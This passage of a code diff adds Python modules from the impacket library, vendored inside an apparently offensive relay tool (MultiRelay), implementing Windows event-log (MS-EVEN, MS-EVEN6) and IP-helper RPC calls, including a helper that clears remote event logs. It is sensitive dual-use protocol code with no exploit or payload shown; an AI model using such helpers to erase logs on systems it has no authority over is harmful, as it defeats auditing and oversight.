+temp_enum_dict['__hash__'] = __hash__
+del __hash__
+
+# _RouteClassAttributeToGetattr is used to provide access to the `name`
+# and `value` properties of enum members while keeping some measure of
+# protection from modification, while still allowing for an enumeration
+# to have members named `name` and `value`.  This works because enumeration
+# members are not set directly on the enum class -- __getattr__ is
+# used to look them up.
+
+@_RouteClassAttributeToGetattr
+def name(self):
+    return self._name_
+temp_enum_dict['name'] = name
+del name
+
+@_RouteClassAttributeToGetattr
+def value(self):
+    return self._value_
+temp_enum_dict['value'] = value
+del value
+
+Enum = EnumMeta('Enum', (object, ), temp_enum_dict)
+del temp_enum_dict
+
+# Enum has now been created
+###########################
+
+class IntEnum(int, Enum):
+    """Enum where members are also (and must be) ints"""
+
+
+def unique(enumeration):
+    """Class decorator that ensures only unique members exist in an enumeration."""
+    duplicates = []
+    for name, member in enumeration.__members__.items():
+        if name != member.name:
+            duplicates.append((name, member.name))
+    if duplicates:
+        duplicate_names = ', '.join(
+                ["%s -> %s" % (alias, name) for (alias, name) in duplicates]
+                )
+        raise ValueError('duplicate names found in %r: %s' %
+                (enumeration, duplicate_names)
+                )
+    return enumeration

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even.py

@@ -0,0 +1,400 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#         Itamar Mizrahi (@MrAnde7son)
+#
+# Description:
+#   [MS-EVEN] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDR, NDRPOINTERNULL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import ULONG, LPWSTR, RPC_UNICODE_STRING, LPSTR, NTSTATUS, NULL, PRPC_UNICODE_STRING, PULONG, USHORT, PRPC_SID, LPBYTE
+from impacket.dcerpc.v5.lsad import PRPC_UNICODE_STRING_ARRAY
+from impacket.structure import Structure
+from impacket import nt_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_EVEN  = uuidtup_to_bin(('82273FDC-E32A-18C3-3F78-827929DC23EA','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+            return 'EVEN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EVEN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.2 EventType
+EVENTLOG_SUCCESS           = 0x0000
+EVENTLOG_ERROR_TYPE        = 0x0001
+EVENTLOG_WARNING_TYPE      = 0x0002
+EVENTLOG_INFORMATION_TYPE  = 0x0004
+EVENTLOG_AUDIT_SUCCESS     = 0x0008
+EVENTLOG_AUDIT_FAILURE     = 0x0010
+
+# 2.2.7 EVENTLOG_HANDLE_A and EVENTLOG_HANDLE_W
+#EVENTLOG_HANDLE_A
+EVENTLOG_HANDLE_W = LPWSTR
+
+# 2.2.9 Constants Used in Method Definitions
+MAX_STRINGS      = 0x00000100
+MAX_SINGLE_EVENT = 0x0003FFFF
+MAX_BATCH_BUFF   = 0x0007FFFF
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+EVENTLOG_SEQUENTIAL_READ = 0x00000001
+EVENTLOG_SEEK_READ       = 0x00000002
+
+EVENTLOG_FORWARDS_READ   = 0x00000004
+EVENTLOG_BACKWARDS_READ  = 0x00000008
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class IELF_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=""'),
+    )
+    def getAlignment(self):
+        return 1
+
+# 2.2.3 EVENTLOGRECORD
+class EVENTLOGRECORD(Structure):
+    structure = (
+        ('Length','<L=0'),
+        ('Reserved','<L=0'),
+        ('RecordNumber','<L=0'),
+        ('TimeGenerated','<L=0'),
+        ('TimeWritten','<L=0'),
+        ('EventID','<L=0'),
+        ('EventType','<H=0'),
+        ('NumStrings','<H=0'),
+        ('EventCategory','<H=0'),
+        ('ReservedFlags','<H=0'),
+        ('ClosingRecordNumber','<L=0'),
+        ('StringOffset','<L=0'),
+        ('UserSidLength','<L=0'),
+        ('UserSidOffset','<L=0'),
+        ('DataLength','<L=0'),
+        ('DataOffset','<L=0'),
+        ('SourceName','z'),
+        ('Computername','z'),
+        ('UserSidPadding',':'),
+        ('_UserSid','_-UserSid', 'self["UserSidLength"]'),
+        ('UserSid',':'),
+        ('Strings',':'),
+        ('_Data','_-Data', 'self["DataLength"]'),
+        ('Data',':'),
+        ('Padding',':'),
+        ('Length2','<L=0'),
+    )
+
+# 2.2.4 EVENTLOG_FULL_INFORMATION
+class EVENTLOG_FULL_INFORMATION(NDRSTRUCT):
+    structure = (
+        ('dwFull', ULONG),
+    )
+
+# 2.2.8 RPC_CLIENT_ID
+class RPC_CLIENT_ID(NDRSTRUCT):
+    structure = (
+        ('UniqueProcess', ULONG),
+        ('UniqueThread', ULONG),
+    )
+
+# 2.2.12 RPC_STRING
+class RPC_STRING(NDRSTRUCT):
+    structure = (
+        ('Length','<H=0'),
+        ('MaximumLength','<H=0'),
+        ('Data',LPSTR),
+    )
+
+    def __setitem__(self, key, value):
+        if key == 'Data' and isinstance(value, NDR) is False:
+            self['Length'] = len(value)
+            self['MaximumLength'] = len(value)
+        return NDRSTRUCT.__setitem__(self, key, value)
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None: msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+
+        if isinstance(self.fields['Data'] , NDRPOINTERNULL):
+            print(" NULL", end=' ')
+        elif self.fields['Data']['ReferentID'] == 0:
+            print(" NULL", end=' ')
+        else:
+            return self.fields['Data'].dump('',indent)
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.9 ElfrClearELFW (Opnum 0)
+class ElfrClearELFW(NDRCALL):
+    opnum = 0
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('BackupFileName', PRPC_UNICODE_STRING),
+    )
+
+class ElfrClearELFWResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.11 ElfrBackupELFW (Opnum 1)
+class ElfrBackupELFW(NDRCALL):
+    opnum = 1
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('BackupFileName', RPC_UNICODE_STRING),
+    )
+
+class ElfrBackupELFWResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.21 ElfrCloseEL (Opnum 2)
+class ElfrCloseEL(NDRCALL):
+    opnum = 2
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrCloseELResponse(NDRCALL):
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.18 ElfrNumberOfRecords (Opnum 4)
+class ElfrNumberOfRecords(NDRCALL):
+    opnum = 4
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrNumberOfRecordsResponse(NDRCALL):
+    structure = (
+        ('NumberOfRecords', ULONG),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.19 ElfrOldestRecord (Opnum 5)
+class ElfrOldestRecord(NDRCALL):
+    opnum = 5
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrOldestRecordResponse(NDRCALL):
+    structure = (
+        ('OldestRecordNumber', ULONG),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.3 ElfrOpenELW (Opnum 7)
+class ElfrOpenELW(NDRCALL):
+    opnum = 7
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('ModuleName', RPC_UNICODE_STRING),
+       ('RegModuleName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrOpenELWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.5 ElfrRegisterEventSourceW (Opnum 8)
+class ElfrRegisterEventSourceW(NDRCALL):
+    opnum = 8
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('ModuleName', RPC_UNICODE_STRING),
+       ('RegModuleName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrRegisterEventSourceWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.1 ElfrOpenBELW (Opnum 9)
+class ElfrOpenBELW(NDRCALL):
+    opnum = 9
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('BackupFileName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrOpenBELWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+class ElfrReadELW(NDRCALL):
+    opnum = 10
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ReadFlags', ULONG),
+       ('RecordOffset', ULONG),
+       ('NumberOfBytesToRead', ULONG),
+    )
+
+class ElfrReadELWResponse(NDRCALL):
+    structure = (
+       ('Buffer', NDRUniConformantArray),
+       ('NumberOfBytesRead', ULONG),
+       ('MinNumberOfBytesNeeded', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.13 ElfrReportEventW (Opnum 11)
+class ElfrReportEventW(NDRCALL):
+    opnum = 11
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('Time', ULONG),
+       ('EventType', USHORT),
+       ('EventCategory', USHORT),
+       ('EventID', ULONG),
+       ('NumStrings', USHORT),
+       ('DataSize', ULONG),
+       ('ComputerName', RPC_UNICODE_STRING),
+       ('UserSID', PRPC_SID),
+       ('Strings', PRPC_UNICODE_STRING_ARRAY),
+       ('Data', LPBYTE),
+       ('Flags', USHORT),
+       ('RecordNumber', PULONG),
+       ('TimeWritten', PULONG),
+    )
+
+class ElfrReportEventWResponse(NDRCALL):
+    structure = (
+       ('RecordNumber', PULONG),
+       ('TimeWritten', PULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0   : (ElfrClearELFW, ElfrClearELFWResponse),
+    1   : (ElfrBackupELFW, ElfrBackupELFWResponse),
+    2   : (ElfrCloseEL, ElfrCloseELResponse),
+    4   : (ElfrNumberOfRecords, ElfrNumberOfRecordsResponse),
+    5   : (ElfrOldestRecord, ElfrOldestRecordResponse),
+    7   : (ElfrOpenELW, ElfrOpenELWResponse),
+    8   : (ElfrRegisterEventSourceW, ElfrRegisterEventSourceWResponse),
+    9   : (ElfrOpenBELW, ElfrOpenBELWResponse),
+    10  : (ElfrReadELW, ElfrReadELWResponse),
+    11  : (ElfrReportEventW, ElfrReportEventWResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hElfrOpenBELW(dce, backupFileName = NULL):
+    request = ElfrOpenBELW()
+    request['UNCServerName'] = NULL
+    request['BackupFileName'] = backupFileName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrOpenELW(dce, moduleName = NULL, regModuleName = NULL):
+    request = ElfrOpenELW()
+    request['UNCServerName'] = NULL
+    request['ModuleName'] = moduleName
+    request['RegModuleName'] = regModuleName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrCloseEL(dce, logHandle):
+    request = ElfrCloseEL()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
+
+def hElfrRegisterEventSourceW(dce, moduleName = NULL, regModuleName = NULL):
+    request = ElfrRegisterEventSourceW()
+    request['UNCServerName'] = NULL
+    request['ModuleName'] = moduleName
+    request['RegModuleName'] = regModuleName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrReadELW(dce, logHandle = '', readFlags = EVENTLOG_SEEK_READ|EVENTLOG_FORWARDS_READ,
+                 recordOffset = 0, numberOfBytesToRead = MAX_BATCH_BUFF):
+    request = ElfrReadELW()
+    request['LogHandle'] = logHandle
+    request['ReadFlags'] = readFlags
+    request['RecordOffset'] = recordOffset
+    request['NumberOfBytesToRead'] = numberOfBytesToRead
+    return dce.request(request)
+
+def hElfrClearELFW(dce, logHandle = '', backupFileName = NULL):
+    request = ElfrClearELFW()
+    request['LogHandle'] = logHandle
+    request['BackupFileName'] = backupFileName
+    return dce.request(request)
+
+def hElfrBackupELFW(dce, logHandle = '', backupFileName = NULL):
+    request = ElfrBackupELFW()
+    request['LogHandle'] = logHandle
+    request['BackupFileName'] = backupFileName
+    return dce.request(request)
+
+def hElfrNumberOfRecords(dce, logHandle):
+    request = ElfrNumberOfRecords()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
+
+def hElfrOldestRecordNumber(dce, logHandle):
+    request = ElfrOldestRecord()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even6.py

@@ -0,0 +1,344 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+# Copyright (c) 2017 @MrAnde7son
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Itamar (@MrAnde7son)
+#
+# Description:
+#   Initial [MS-EVEN6] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too.
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD, LPWSTR, ULONG, LARGE_INTEGER, WORD, BYTE
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray, NDRUniVaryingArray, NDRSTRUCT
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_EVEN6 = uuidtup_to_bin(('F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__(self):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+            return 'EVEN6 SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EVEN6 SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Evt Path Flags
+EvtQueryChannelName = 0x00000001
+EvtQueryFilePath = 0x00000002
+EvtReadOldestToNewest = 0x00000100
+EvtReadNewestToOldest = 0x00000200
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class CONTEXT_HANDLE_LOG_HANDLE(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_LOG_HANDLE(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_LOG_HANDLE),
+    )
+
+class CONTEXT_HANDLE_LOG_QUERY(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_LOG_QUERY),
+    )
+
+class LPPCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+    referent = (
+        ('Data', PCONTEXT_HANDLE_LOG_QUERY),
+    )
+
+class CONTEXT_HANDLE_OPERATION_CONTROL(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_OPERATION_CONTROL(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_OPERATION_CONTROL),
+    )
+
+# 2.2.11 EvtRpcQueryChannelInfo
+class EvtRpcQueryChannelInfo(NDRSTRUCT):
+    structure = (
+        ('Name', LPWSTR),
+        ('Status', DWORD),
+    )
+
+class EvtRpcQueryChannelInfoArray(NDRUniVaryingArray):
+    item = EvtRpcQueryChannelInfo
+
+class LPEvtRpcQueryChannelInfoArray(NDRPOINTER):
+    referent = (
+        ('Data', EvtRpcQueryChannelInfoArray)
+    )
+
+class RPC_INFO(NDRSTRUCT):
+    structure = (
+        ('Error', DWORD),
+        ('SubError', DWORD),
+        ('SubErrorParam', DWORD),
+    )
+
+class PRPC_INFO(NDRPOINTER):
+    referent = (
+        ('Data', RPC_INFO)
+    )
+
+class WSTR_ARRAY(NDRUniVaryingArray):
+    item = WSTR
+
+class DWORD_ARRAY(NDRUniVaryingArray):
+    item = DWORD
+
+class LPDWORD_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', DWORD_ARRAY)
+    )
+
+class BYTE_ARRAY(NDRUniVaryingArray):
+    item = 'c'
+
+class CBYTE_ARRAY(NDRUniVaryingArray):
+    item = BYTE
+
+class CDWORD_ARRAY(NDRUniConformantArray):
+    item = DWORD
+
+class LPBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', CBYTE_ARRAY)
+    )
+
+class ULONG_ARRAY(NDRUniVaryingArray):
+    item = ULONG
+
+# 2.3.1 EVENT_DESCRIPTOR
+class EVENT_DESCRIPTOR(NDRSTRUCT):
+    structure = (
+        ('Id', WORD),
+        ('Version', BYTE),
+        ('Channel', BYTE),
+        ('LevelSeverity', BYTE),
+        ('Opcode', BYTE),
+        ('Task', WORD),
+        ('Keyword', ULONG),
+    )
+
+class BOOKMARK(NDRSTRUCT):
+    structure = (
+        ('BookmarkSize', DWORD),
+        ('HeaderSize', '<L=0x18'),
+        ('ChannelSize', DWORD),
+        ('CurrentChannel', DWORD),
+        ('ReadDirection', DWORD),
+        ('RecordIdsOffset', DWORD),
+        ('LogRecordNumbers', ULONG_ARRAY),
+    )
+
+
+#2.2.17 RESULT_SET
+class RESULT_SET(NDRSTRUCT):
+    structure = (
+        ('TotalSize', DWORD),
+        ('HeaderSize', DWORD),
+        ('EventOffset', DWORD),
+        ('BookmarkOffset', DWORD),
+        ('BinXmlSize', DWORD),
+        ('EventData', BYTE_ARRAY),
+        #('NumberOfSubqueryIDs', '<L=0'),
+        #('SubqueryIDs', BYTE_ARRAY),
+        #('BookMarkData', BOOKMARK),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+class EvtRpcRegisterLogQuery(NDRCALL):
+    opnum = 5
+    structure = (
+        ('Path', LPWSTR),
+        ('Query', WSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcRegisterLogQueryResponse(NDRCALL):
+    structure = (
+        ('Handle', CONTEXT_HANDLE_LOG_QUERY),
+        ('OpControl', CONTEXT_HANDLE_OPERATION_CONTROL),
+        ('QueryChannelInfoSize', DWORD),
+        ('QueryChannelInfo', EvtRpcQueryChannelInfoArray),
+        ('Error', RPC_INFO),
+        )
+
+class EvtRpcQueryNext(NDRCALL):
+    opnum = 11
+    structure = (
+        ('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
+        ('NumRequestedRecords', DWORD),
+        ('TimeOutEnd', DWORD),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcQueryNextResponse(NDRCALL):
+    structure = (
+        ('NumActualRecords', DWORD),
+        ('EventDataIndices', DWORD_ARRAY),
+        ('EventDataSizes', DWORD_ARRAY),
+        ('ResultBufferSize', DWORD),
+        ('ResultBuffer', BYTE_ARRAY),
+        ('ErrorCode', ULONG),
+    )
+
+class EvtRpcQuerySeek(NDRCALL):
+    opnum = 12
+    structure = (
+        ('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
+        ('Pos', LARGE_INTEGER),
+        ('BookmarkXML', LPWSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcQuerySeekResponse(NDRCALL):
+    structure = (
+        ('Error', RPC_INFO),
+    )
+
+class EvtRpcClose(NDRCALL):
+    opnum = 13
+    structure = (
+        ("Handle", CONTEXT_HANDLE_LOG_HANDLE),
+    )
+
+class EvtRpcCloseResponse(NDRCALL):
+    structure = (
+        ("Handle", PCONTEXT_HANDLE_LOG_HANDLE),
+        ('ErrorCode', ULONG),
+    )
+
+class EvtRpcOpenLogHandle(NDRCALL):
+    opnum = 17
+    structure = (
+        ('Channel', WSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcOpenLogHandleResponse(NDRCALL):
+    structure = (
+        ('Handle', PCONTEXT_HANDLE_LOG_HANDLE),
+        ('Error', RPC_INFO),
+    )
+
+class EvtRpcGetChannelList(NDRCALL):
+    opnum = 19
+    structure = (
+        ('Flags', DWORD),
+    )
+
+class EvtRpcGetChannelListResponse(NDRCALL):
+    structure = (
+        ('NumChannelPaths', DWORD),
+        ('ChannelPaths', WSTR_ARRAY),
+        ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+    5   : (EvtRpcRegisterLogQuery, EvtRpcRegisterLogQueryResponse),
+    11  : (EvtRpcQueryNext,  EvtRpcQueryNextResponse),
+    12  : (EvtRpcQuerySeek, EvtRpcQuerySeekResponse),
+    13  : (EvtRpcClose, EvtRpcCloseResponse),
+    17  : (EvtRpcOpenLogHandle, EvtRpcOpenLogHandle),
+    19  : (EvtRpcGetChannelList, EvtRpcGetChannelListResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+
+def hEvtRpcRegisterLogQuery(dce, path, flags, query='*\x00'):
+    request = EvtRpcRegisterLogQuery()
+
+    request['Path'] = path
+    request['Query'] = query
+    request['Flags'] = flags
+    resp = dce.request(request)
+    return resp
+
+def hEvtRpcQueryNext(dce, handle, numRequestedRecords, timeOutEnd=1000):
+    request = EvtRpcQueryNext()
+
+    request['LogQuery'] = handle
+    request['NumRequestedRecords'] = numRequestedRecords
+    request['TimeOutEnd'] = timeOutEnd
+    request['Flags'] = 0
+    status = system_errors.ERROR_MORE_DATA
+    resp = dce.request(request)
+    while status == system_errors.ERROR_MORE_DATA:
+        try:
+            resp = dce.request(request)
+        except DCERPCException as e:
+            if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+                raise
+            elif str(e).find('ERROR_TIMEOUT') < 0:
+                raise
+            resp = e.get_packet()
+        return resp
+
+def hEvtRpcClose(dce, handle):
+    request = EvtRpcClose()
+    request['Handle'] = handle
+    resp = dce.request(request)
+    return resp
+
+def hEvtRpcOpenLogHandle(dce, channel, flags):
+    request = EvtRpcOpenLogHandle()
+
+    request['Channel'] = channel
+    request['Flags'] = flags
+    return dce.request(request)
+
+def hEvtRpcGetChannelList(dce):
+    request = EvtRpcGetChannelList()
+
+    request['Flags'] = 0
+    resp = dce.request(request)
+    return resp

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/iphlp.py

@@ -0,0 +1,172 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Description:
+#  Implementation of iphlpsvc.dll MSRPC calls (Service that offers IPv6 connectivity over an IPv4 network)
+
+from socket import inet_aton
+
+from impacket import uuid
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.dtypes import BYTE, ULONG, WSTR, GUID, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_IPHLP_IP_TRANSITION   = uuidtup_to_bin(('552d076a-cb29-4e44-8b6a-d15e59e2c0af', '1.0'))
+
+# RPC_IF_ALLOW_LOCAL_ONLY
+MSRPC_UUID_IPHLP_TEREDO          = uuidtup_to_bin(('ecbdb051-f208-46b9-8c8b-648d9d3f3944', '1.0'))
+MSRPC_UUID_IPHLP_TEREDO_CONSUMER = uuidtup_to_bin(('1fff8faa-ec23-4e3f-a8ce-4b2f8707e636', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'IPHLP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'IPHLP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Notification types
+NOTIFICATION_ISATAP_CONFIGURATION_CHANGE               = 0
+NOTIFICATION_PROCESS6TO4_CONFIGURATION_CHANGE          = 1
+NOTIFICATION_TEREDO_CONFIGURATION_CHANGE               = 2
+NOTIFICATION_IP_TLS_CONFIGURATION_CHANGE               = 3
+NOTIFICATION_PORT_CONFIGURATION_CHANGE                 = 4
+NOTIFICATION_DNS64_CONFIGURATION_CHANGE                = 5
+NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX = 6
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# Opnum 0
+class IpTransitionProtocolApplyConfigChanges(NDRCALL):
+    opnum = 0
+    structure = (
+       ('NotificationNum', BYTE),
+    )
+
+class IpTransitionProtocolApplyConfigChangesResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 1
+class IpTransitionProtocolApplyConfigChangesEx(NDRCALL):
+    opnum = 1
+    structure = (
+       ('NotificationNum', BYTE),
+       ('DataLength', ULONG),
+       ('Data', BYTE_ARRAY),
+    )
+
+class IpTransitionProtocolApplyConfigChangesExResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 2
+class IpTransitionCreatev6Inv4Tunnel(NDRCALL):
+    opnum = 2
+    structure = (
+       ('LocalAddress', "4s=''"),
+       ('RemoteAddress', "4s=''"),
+       ('InterfaceName', WSTR),
+    )
+
+class IpTransitionCreatev6Inv4TunnelResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 3
+class IpTransitionDeletev6Inv4Tunnel(NDRCALL):
+    opnum = 3
+    structure = (
+       ('TunnelGuid', GUID),
+    )
+
+class IpTransitionDeletev6Inv4TunnelResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+ 0 : (IpTransitionProtocolApplyConfigChanges, IpTransitionProtocolApplyConfigChangesResponse),
+ 1 : (IpTransitionProtocolApplyConfigChangesEx, IpTransitionProtocolApplyConfigChangesExResponse),
+ 2 : (IpTransitionCreatev6Inv4Tunnel, IpTransitionCreatev6Inv4TunnelResponse),
+ 3 : (IpTransitionDeletev6Inv4Tunnel, IpTransitionDeletev6Inv4TunnelResponse)
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+# For all notifications except EX
+def hIpTransitionProtocolApplyConfigChanges(dce, notification_num):
+    request = IpTransitionProtocolApplyConfigChanges()
+    request['NotificationNum'] = notification_num
+
+    return dce.request(request)
+
+# Only for NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX
+# No admin required
+def hIpTransitionProtocolApplyConfigChangesEx(dce, notification_num, notification_data):
+    request = IpTransitionProtocolApplyConfigChangesEx()
+    request['NotificationNum'] = notification_num
+    request['DataLength'] = len(notification_data)
+    request['Data'] = notification_data
+
+    return dce.request(request)
+
+# Same as netsh interface ipv6 add v6v4tunnel "Test Tunnel" 192.168.0.1 10.0.0.5
+def hIpTransitionCreatev6Inv4Tunnel(dce, local_address, remote_address, interface_name):
+    request = IpTransitionCreatev6Inv4Tunnel()
+    request['LocalAddress'] = inet_aton(local_address)
+    request['RemoteAddress'] = inet_aton(remote_address)
+
+    request['InterfaceName'] = checkNullString(interface_name)
